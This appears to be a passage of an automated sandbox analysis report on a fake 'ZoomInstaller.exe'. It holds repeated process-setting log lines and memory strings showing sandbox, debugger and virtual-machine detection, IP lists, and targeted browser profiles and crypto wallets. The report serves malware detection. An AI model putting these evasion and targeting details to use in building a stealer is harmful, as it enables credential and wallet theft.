Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: ZoomInstaller.exe Binary or memory string: SCHED={PC:, GP->STATUS= PLUGINPATH= : UNKNOWN PC CALLED FROM RUNTIME: PID=LEVEL 3 RESETSRMOUNT ERRORTIMER EXPIREDEXCHANGE FULLREGENUMKEYEXWREGOPENKEYEXWCERTOPENSTOREFINDNEXTFILEWMAPVIEWOFFILEVIRTUALUNLOCKWRITECONSOLEWFREEADDRINFOWGETHOSTBYNAMEGETSERVBYNAMEPARSING TIME OUT OF RANGE IS TOO LARGENOT AVAILABLEDALTLDPSUGCT?3814697265625GETTEMPPATH2WMODULE32NEXTWRTLGETVERSIONREGENUMVALUEWIMAGELIST_ADDCREATERECTRGNGETDEVICECAPSSETBRUSHORGEXCREATEACTCTXWFINDRESOURCEWRTLMOVEMEMORYCOTASKMEMFREEOLEINITIALIZESYSFREESTRINGWGLSHARELISTSPDHCLOSEQUERYSHELLEXECUTEWANIMATEWINDOWDESTROYWINDOWDRAWFOCUSRECTGETCLASSNAMEWGETCLIENTRECTGETMENUITEMIDGETSCROLLINFOGETSYSTEMMENUGETWINDOWRECTOPENCLIPBOARDSETSCROLLINFOGETTHEMECOLOROPENTHEMEDATAENUMPRINTERSWNAME TOO LONGTLSMAXRSASIZEACCESS DENIEDUSER CANCELEDPKCS1WITHSHA1ECDSAWITHSHA1CLIENT_RANDOMGZIP, DEFLATEGOCACHEVERIFYINSTALLGOROOTHTML/TEMPLATEREGDELETEKEYWDELETESERVICESTARTSERVICEWGETDRIVETYPEWTHREAD32FIRSTWAITCOMMEVENTRTLINITSTRINGENUMPROCESSESEXITWINDOWSEXTIMEENDPERIODWTSFREEMEMORYINVALID ASN.1SHA256-RSAPSSSHA384-RSAPSSSHA512-RSAPSSEMAIL ADDRESSSHARED_SECRETEMPTY INTEGERUNSUPPORTED: 181.214.153.11194.154.78.137213.33.190.21988.153.199.169194.154.78.16092.211.109.160188.105.91.11634.141.146.114188.105.91.173193.128.114.4588.132.227.23888.132.226.20388.132.225.10092.211.192.144192.211.110.74188.105.91.143178.239.165.7034.253.248.228TVAUENRRRAOKWAVMWARE SVGA 3DVMWAREUSER.EXEXENSERVICE.EXEVMWARETRAY.EXECHROME DEFAULTYANDEX DEFAULTCOCCOC DEFAULTIS A DIRECTORY_SECURE_DELETEUNEXPECTED EOFINTERNAL ERRORGETPROTOBYNAMEUNKNOWN MODE: CONTENT-LENGTHMAX_FRAME_SIZEPROTOCOL_ERRORINTERNAL_ERRORREFUSED_STREAMERR_UNKNOWN_%DACCEPT-CHARSETCONTENT-LENGTHREAD_FRAME_EOFUNKNOWN ERROR UNKNOWN CODE: NOT ACCEPTABLECOMPUTERNAMEEX
Source: ZoomInstaller.exe Binary or memory string: MOREBUF={PC:: NO FRAME (SP=RUNTIME: FRAME TS SET IN TIMERTRACEBACK STUCKADVERTISE ERRORKEY HAS EXPIREDNETWORK IS DOWNNO MEDIUM FOUNDNO SUCH PROCESSGETADAPTERSINFOCREATEHARDLINKWDEVICEIOCONTROLFLUSHVIEWOFFILEGETCOMMANDLINEWGETSTARTUPINFOWPROCESS32FIRSTWUNMAPVIEWOFFILEFAILED TO LOAD FAILED TO FIND : CANNOT PARSE ,M3.2.0,M11.1.0476837158203125IMPERSONATESELFOPENTHREADTOKENINVALID ARGSIZE<INVALID VALUE>REFLECTLITE.SETEXCLUDECLIPRECTGETENHMETAFILEWGETTEXTMETRICSWPLAYENHMETAFILEGDIPLUSSHUTDOWNGETTHREADLOCALEOLEUNINITIALIZEWGLGETCURRENTDCDRAGACCEPTFILESCALLWINDOWPROCWCREATEPOPUPMENUCREATEWINDOWEXWDIALOGBOXPARAMWGETACTIVEWINDOWGETDPIFORWINDOWGETRAWINPUTDATAINSERTMENUITEMWISWINDOWENABLEDISWINDOWVISIBLEPOSTQUITMESSAGESETACTIVEWINDOWSETWINEVENTHOOKTRACKMOUSEEVENTWINDOWFROMPOINTDRAWTHEMETEXTEXACCEPT-LANGUAGEX-FORWARDED-FOR()<>@,;:\"/[]?=INVALID POINTERX509KEYPAIRLEAFRECORD OVERFLOWBAD CERTIFICATEPKCS1WITHSHA256PKCS1WITHSHA384PKCS1WITHSHA512CLIENTAUTHTYPE(UNKNOWN VERSIONJSTMPLLITINTERPTARINSECUREPATHX509USEPOLICIESREGCREATEKEYEXWREGDELETEVALUEW IS UNAVAILABLEGETSECURITYINFOSETSECURITYINFOADDDLLDIRECTORYFINDNEXTVOLUMEWFINDVOLUMECLOSEGETCOMMTIMEOUTSISWOW64PROCESS2QUERYDOSDEVICEWSETCOMMTIMEOUTSSETVOLUMELABELWRTLDEFAULTNPACLCLSIDFROMSTRINGSTRINGFROMGUID2ISWINDOWUNICODETIMEBEGINPERIOD0601021504Z0700INVALID BOOLEANNON-MINIMAL TAGUNKNOWN GO TYPEAVX512VPOPCNTDQHTTP TOOLKIT.EXEJOEBOXSERVER.EXE0123456789ABCDEFREAD AFTER CLOSEAFTER OBJECT KEYGETDESKTOPWINDOW2006-01-02 15:042006-01-02T15:04STRING TOO LARGE_WRITABLE_SCHEMAAUTH_USER_CHANGEAUTH_USER_DELETEDIVISION BY ZERO()<>@,;:\"/[]?= HOSTLOOKUPORDER=/ETC/RESOLV.CONFNON-IPV4 ADDRESSNON-IPV6 ADDRESSUNKNOWN NETWORK NO COLON ON LINESETTINGS_TIMEOUTFRAME_SIZE_ERRORCONTENT-ENCODINGCONTENT-ENCODINGCONTENT-LANGUAGECONTENT-LOCATIONWWW-AUTHENTICATEPROXY-CONNECTIONREAD_FRAME_OTHER%S %S HTTP/1.1
Source: ZoomInstaller.exe Binary or memory string: HANDSHAKEMATH/RANDWINMM.DLLPURGECOMMSETUPCOMMINFO_HASHQ9IATRKPRHQARZHRDBPJD1BNJKFVLHPXMDUOPVYXX64DBG.EXEX96DBG.EXEVMSRVC.EXEX32DBG.EXEPRL_CC.EXECHROME.EXEMSEDGE.EXEMOTDEPASSEPASSPHRASESAUVEGARDEMATHWALLETEVERWALLETPETRAAPTOSFEWCHAMOVEPALIWALLETMETAMASK_EMETAMASK_O FOR TYPE USER32.DLL2006-01-02_AUTH_USER_AUTH_PASS_AUTH_SALTIMPOSSIBLE
Source: ZoomInstaller.exe Binary or memory string: INVALID EXCHANGENO ROUTE TO HOSTINVALID ARGUMENTMESSAGE TOO LONGOBJECT IS REMOTEREMOTE I/O ERRORSETFILEPOINTEREXOPENPROCESSTOKENREGQUERYINFOKEYWREGQUERYVALUEEXWDNSNAMECOMPARE_WCREATEDIRECTORYWFLUSHFILEBUFFERSGETCOMPUTERNAMEWGETFULLPATHNAMEWGETLONGPATHNAMEWREMOVEDIRECTORYWNETAPIBUFFERFREETIME: BAD [0-9]*2384185791015625GODEBUG: VALUE "DUPLICATETOKENEXGETCURRENTTHREADRTLVIRTUALUNWIND: VALUE OF TYPE CONTEXT CANCELEDIMAGELIST_CREATEIMAGELIST_DRAWEXGETOPENFILENAMEWGETSAVEFILENAMEWCLOSEENHMETAFILECOPYENHMETAFILEWCREATEDIBSECTIONGETVIEWPORTORGEXSETVIEWPORTORGEXGDIPDISPOSEIMAGEGETCONSOLETITLEWGETCONSOLEWINDOWGETMODULEHANDLEWGETNUMBERFORMATWCOCREATEINSTANCECOGETCLASSOBJECTWGLCREATECONTEXTWGLDELETECONTEXTPDHVALIDATEPATHWADJUSTWINDOWRECTBRINGWINDOWTOTOPDISPATCHMESSAGEWENUMCHILDWINDOWSGETCLIPBOARDDATAGETMENUITEMCOUNTGETMENUITEMINFOWGETSYSCOLORBRUSHGETSYSTEMMETRICSISDIALOGMESSAGEWUNREGISTERCLASSWREGISTERCLASSEXWSETCLIPBOARDDATASETMENUITEMINFOWTRACKPOPUPMENUEXTRANSLATEMESSAGEGETTHEMEPARTSIZECONTENT-LANGUAGEINVALID DNS NAMERCODEFORMATERRORUNPACKING HEADERNO RENEGOTIATIONSIGNATURESCHEME(INVALID ENCODINGSETENTRIESINACLWSETSERVICESTATUSCRYPTPROTECTDATACRYPTQUERYOBJECTCONNECTNAMEDPIPECREATEJOBOBJECTWCREATENAMEDPIPEWDEFINEDOSDEVICEWFINDFIRSTVOLUMEWGETLOGICALDRIVESGETNAMEDPIPEINFOGETPRIORITYCLASSSETDLLDIRECTORYWSETFILEVALIDDATASETPRIORITYCLASSVIRTUALPROTECTEXRTLGETCURRENTPEBGETGUITHREADINFOWINVERIFYTRUSTEXLENGTH TOO LARGEAVX512VPCLMULQDQFIDDLER.WEBUI.EXEVGAUTHSERVICE.EXEPROCESSHACKER.EXEJOEBOXCONTROL.EXEWRITE AFTER CLOSEREFLECT.VALUE.INTIN STRING LITERAL0123456789ABCDEFX0123456789ABCDEFX%%!%C(BIG.INT=%S)MULTIPARTMAXPARTSMESSAGE TOO LARGEINVALID STREAM IDTRANSFER-ENCODINGHEADER_TABLE_SIZECOMPRESSION_ERRORENHANCE_YOUR_CALMHTTP_1_1_REQUIREDIF-MODIFIED-SINCEFRAME_PING_LENGTHTRUNCATED HEADERSIF-MODIFIED-SINCETRANSFER-ENCODINGX-FORWARDED-PROTOX-IDEMPOTENCY-KEYMOVED PERMANENTLYFAILED DEPENDENCYTOO MANY REQUESTSWINREADLINKVOLUMEEXEC: KILLING CMDEXEC: NOT STARTEDGOROUTINE PROFILEALLTHREADSSYSCALLGC ASSIST MARKINGSELECT (NO CASES)SYNC.RWMUTEX.LOCKWAIT FOR GC CYCLETRACE PROC STATUSSYNC.(*COND).WAIT: MISSING METHOD NOTETSLEEPG ON G0BAD TINYSIZECLASSKEY ALIGN TOO BIGRUNTIME: POINTER G ALREADY SCANNEDMARK - BAD STATUSSCANOBJECT N == 0SWEPT CACHED SPANMARKBITS OVERFLOWRUNTIME: SUMMARY[RUNTIME: LEVEL = , P.SEARCHADDR = RTLGETCURRENTPEBRUNTIME.NEWOSPROCRUNTIME/INTERNAL/THREAD EXHAUSTIONLOCKED M0 WOKE UPENTERSYSCALLBLOCK SPINNINGTHREADS=GP.WAITING != NILUNKNOWN CALLER PCSTACK: FRAME={SP:RUNTIME: NAMEOFF RUNTIME: TYPEOFF RUNTIME: TEXTOFF PERMISSION DENIEDWRONG MEDIUM TYPENO DATA AVAILABLEEXEC FORMAT ERRORLOOKUPACCOUNTSIDWDNSRECORDLISTFREEGETCURRENTPROCESSGETSHORTPATHNAMEWWSAENUMPROTOCOLSWGTB STANDARD TIMEFLE STANDARD TIMEGMT STANDARD TIMECORRUPT ZIP FILE FRACTIONAL SECONDINDEX > WINDOWEND1192092895507812559604644775390625INVALID BIT SIZE UNKNOWN TYPE KIND HAS INVALID NAMEREFLECT: CALL OF REFLECT.VALUE.LENREFLECT: NEW(NIL)IMAGELIST_DESTROYCHOOSEPIXELFORMATDELETEENHMETAFILEINTERSECTCLIPR
Source: ZoomInstaller.exe Binary or memory string: RUNQUEUE= STOPWAIT= RUNQSIZE= GFREECNT= THROWING= SPINNING=ATOMICAND8FLOAT64NANFLOAT32NANEXCEPTION PTRSIZE= TARGETPC= UNTIL PC=UNKNOWN PCRUNTIME: GGOROUTINE TERMINATEDOWNER DIEDDNSQUERY_WGETIFENTRYCANCELIOEXCREATEPIPEGETVERSIONWSACLEANUPWSASTARTUPGETSOCKOPTDNSAPI.DLLWS2_32.DLL%!WEEKDAY(SHORT READ12207031256103515625PARSEFLOATLOCKFILEEXWSASOCKETWCOMPLEX128T.KIND == COMBINERGNGETBKCOLORGETOBJECTWSETBKCOLORSTRETCHBLTALPHABLENDGLOBALFREEGLOBALLOCKDRAGFINISHBEGINPAINTCREATEMENUDELETEMENUDRAWICONEXGETDLGITEMGETSUBMENULOADIMAGEWMOVEWINDOWREMOVEMENUSETCAPTURESHOWWINDOWCONTENT-IDMESSAGE-IDPARSEADDR(INVALID IPCLASSCSNETCLASSCHAOSADDITIONALSKIPPING: RES BINDERRES MASTERRESUMPTIONEXP MASTERHTTP_PROXYHTTP_PROXYHTTP2DEBUGCRYPTO/TLSRIPEMD-160DWMAPI.DLLISVALIDSIDLOCALALLOCOPENEVENTWOPENMUTEXWOPENTHREADPULSEEVENTRESETEVENTSHA256-RSASHA384-RSASHA512-RSADSA-SHA256ECDSA-SHA1BASE_NONCEPOSTALCODEAVX512IFMAAVX512VBMIAVX512VNNIAVX512GFNIAVX512VAESAVX512BF1678.139.8.5095.25.81.2435.199.6.1380.211.0.9734.105.0.27FV-AZ269-80ARCHIBALDPCRUNNERADMINAAYRAP7XFUOWATCHER.EXEMITMWEB.EXECHARLES.EXEPOSTMAN.EXEFIDDLER.EXEOLLYDBG.EXEFIDDLER.EXEREGEDIT.EXETASKMGR.EXEVMUSRVC.EXEDF5SERV.EXEQEMU-GA.EXEOLLYDBG.EXEDISCORD.EXEUSER_DATA#2USER_DATA#3USER_DATA#4USER_DATA#5IDENTIFIANTYOROIWALLETKARDIACHAINNIFTYWALLETBRAVEWALLETEQUALWALLETGUILDWALLETMARSHALJSONMARSHALTEXTUNREACHABLE_AUTH_CRYPT_QUERY_ONLY_CACHE_SIZESHORT WRITESUBMISSIONSNIL CONTEXTI/O TIMEOUTHTTP2SERVERHTTP2CLIENTENABLE_PUSHEND_HEADERS/INDEX.HTML ERRCODE=%V, SETTINGS:RETRY-AFTERTTL EXPIREDEARLY HINTSBAD REQUESTBAD GATEWAY/DEV/STDOUT/DEV/STDERROPENPROCESSGETFILETYPE BYTES ...
Source: ZoomInstaller.exe Binary or memory string: RUNTIME: SP=ABI MISMATCHWRONG TIMERSINVALID SLOTHOST IS DOWNILLEGAL SEEKGETLENGTHSIDGETLASTERRORGETSTDHANDLEGETTEMPPATHWLOADLIBRARYWREADCONSOLEWSETENDOFFILETRANSMITFILEGETADDRINFOWADVAPI32.DLLIPHLPAPI.DLLKERNEL32.DLLNETAPI32.DLL152587890625762939453125OPENSERVICEWREVERTTOSELFCREATEEVENTWGETCONSOLECPUNLOCKFILEEXVIRTUALQUERY HAS NO NAME HAS NO TYPEREFLECT.COPYCOMCTL32.DLLCOMDLG32.DLLCHOOSECOLORWCREATEBITMAPDELETEOBJECTEXTCREATEPENGETTEXTCOLORSELECTOBJECTSETTEXTCOLORGRADIENTFILLGLOBALUNLOCKLOADRESOURCELOCKRESOURCESETLASTERROROLEAUT32.DLLSYSSTRINGLENOPENGL32.DLLPDHOPENQUERYEXTRACTICONWENABLEWINDOWGETCURSORPOSPEEKMESSAGEWPOSTMESSAGEWREDRAWWINDOWSENDMESSAGEWSETCURSORPOSSETWINDOWPOSUPDATEWINDOWWINDOWFROMDCWINSPOOL.DRVRANDAUTOSEEDMIME-VERSIONX-IMFORWARDSX-POWERED-BYCONTENT TYPERCODESUCCESSRCODEREFUSEDNOT POLLABLETLSUNSAFEEKMCLOSE NOTIFYREMOTE ERRORC HS TRAFFICS HS TRAFFICC AP TRAFFICS AP TRAFFIC (SENSITIVE)GOTYPESALIASCFGMGR32.DLLSETUPAPI.DLLWINTRUST.DLLWTSAPI32.DLLREPORTEVENTWCREATEMUTEXWGETCOMMSTATEGETPROCESSIDRELEASEMUTEXRESUMETHREADSETCOMMBREAKSETCOMMSTATESETERRORMODESETSTDHANDLETHREAD32NEXTVIRTUALALLOCNTCREATEFILECOCREATEGUIDECDSA-SHA256ECDSA-SHA384ECDSA-SHA512CALLER ERRORSERIALNUMBERAVX5124FMAPSAVX512BITALG88.132.231.7152.251.116.35194.154.78.6920.99.160.173195.74.76.22234.105.183.6892.211.55.19979.104.209.3334.145.89.174109.74.154.90195.239.51.59192.40.57.23464.124.12.16234.142.74.220109.74.154.9134.105.72.241109.74.154.92213.33.142.5093.216.75.209192.87.28.10334.85.253.17023.128.248.4635.229.69.22734.141.245.2534.85.243.24187.166.50.21334.145.195.5835.192.93.10784.147.54.113W0FJUOVMCCP5AMITMPROXY.EXEWIRESHARK.EXEWIRESHARK.EXEPRL_TOOLS.EXEFILEZILLA.EXEENCRYPTED_KEYGUEST PROFILEBRAVE DEFAULTOPERA DEFAULTBLISK DEFAULTAUTHENTICATORHARMONYWALLET_BUSY_TIMEOUT_FOREIGN_KEYS_JOURNAL_MODE_LOCKING_MODEAUTH_USER_ADDLAME REFERRALSTREAM_CLOSEDCONNECT_ERRORWINDOW_UPDATEAUTHORIZATIONCACHE-CONTROLLAST-MODIFIEDACCEPT-RANGESIF-NONE-MATCH[FRAMEHEADER INVALID BASE ACCEPT-RANGESAUTHORIZATIONCACHE-CONTROLCONTENT-RANGEIF-NONE-MATCHLAST-MODIFIEDFQDN TOO LONGSOCKS CONNECTRESET CONTENTLOOP DETECTEDFIELD NAME %Q IN HOST NAMEFINDFIRSTFILEWAKEABLESLEEPPROFMEMACTIVEPROFMEMFUTURETRACESTACKTABEXECRINTERNALTESTRINTERNALGC SWEEP WAITOUT OF MEMORY IS NIL, NOT VALUE METHOD BAD MAP STATE SPAN.BASE()=BAD FLUSHGEN , NOT POINTER != SWEEPGEN MB GLOBALS, WORK.NPROC= WORK.NWAIT= NSTACKROOTS= FLUSHEDWORK DOUBLE UNLOCK S.SPANCLASS= MB) WORKERS=MIN TOO LARGE-BYTE BLOCK (RUNTIME: VAL=RUNTIME: SEQ=FATAL ERROR: IDLETHREADS= SYSCALLTICK=LOAD64 FAILEDXADD64 FAILEDXCHG64 FAILEDNIL STACKBASE}
Source: ZoomInstaller.exe Binary or memory string: INVALID EXCHANGENO ROUTE TO HOSTINVALID ARGUMENTMESSAGE TOO LONGOBJECT IS REMOTEREMOTE I/O ERRORSETFILEPOINTEREXOPENPROCESSTOKENREGQUERYINFOKEYWREGQUERYVALUEEXWDNSNAMECOMPARE_WCREATEDIRECTORYWFLUSHFILEBUFFERSGETCOMPUTERNAMEWGETFULLPATHNAMEWGETLONGPATHNAMEWREMOVEDIRECTORYWNETAPIBUFFERFREETIME: BAD [0-9]*2384185791015625GODEBUG: VALUE "DUPLICATETOKENEXGETCURRENTTHREADRTLVIRTUALUNWIND: VALUE OF TYPE CONTEXT 